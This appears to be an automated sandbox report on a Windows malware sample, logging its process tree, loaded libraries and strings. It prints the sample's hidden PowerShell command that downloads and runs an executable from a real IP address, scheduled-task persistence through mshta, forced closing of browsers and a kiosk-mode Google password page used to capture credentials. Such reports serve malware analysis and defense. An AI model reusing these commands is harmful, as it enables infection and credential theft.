Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 6d81c0d08d.exe, 00000015.00000003.2691543840.0000000009479000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2367006294.000000000589B000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2391276903.00000000058A1000.00000004.00000800.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2366675603.00000000058B6000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2450289434.0000000005A16000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 00000018.00000003.2452143263.00000000059FB000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2611100161.000000000569B000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2665618995.000000000569D000.00000004.00000800.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2606821261.00000000056B6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: random.exe	Virustotal: Detection: 28%
Source: random.exe	ReversingLabs: Detection: 34%

Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 6d81c0d08d.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 6d81c0d08d.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 0a633717d1.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\m5569IMo3.hta
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE "C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE"
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE "C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe "C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe "C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe"
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe "C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe "C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe "C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe "C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe "C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe"
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe "C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe"
Source: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn YCMdYmaqjP5 /tr "mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn YCMdYmaqjP5 /tr "mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe "C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE "C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE"
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe "C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2236 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb019aa1-e8ce-4797-83d1-5e5128b5efef} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 257c2f6c110 socket
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe "C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe "C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe"
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ajDhEmaEm2d /tr "mshta C:\Users\user\AppData\Local\Temp\m5569IMo3.hta" /sc minute /mo 25 /ru "user" /f	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE "C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'X13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE "C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE"	Jump to behavior
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe "C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe "C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe "C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe "C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe "C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe "C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe "C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe "C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe "C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe"
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn YCMdYmaqjP5 /tr "mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn YCMdYmaqjP5 /tr "mshta C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE "C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2236 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bb019aa1-e8ce-4797-83d1-5e5128b5efef} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 257c2f6c110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\random.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
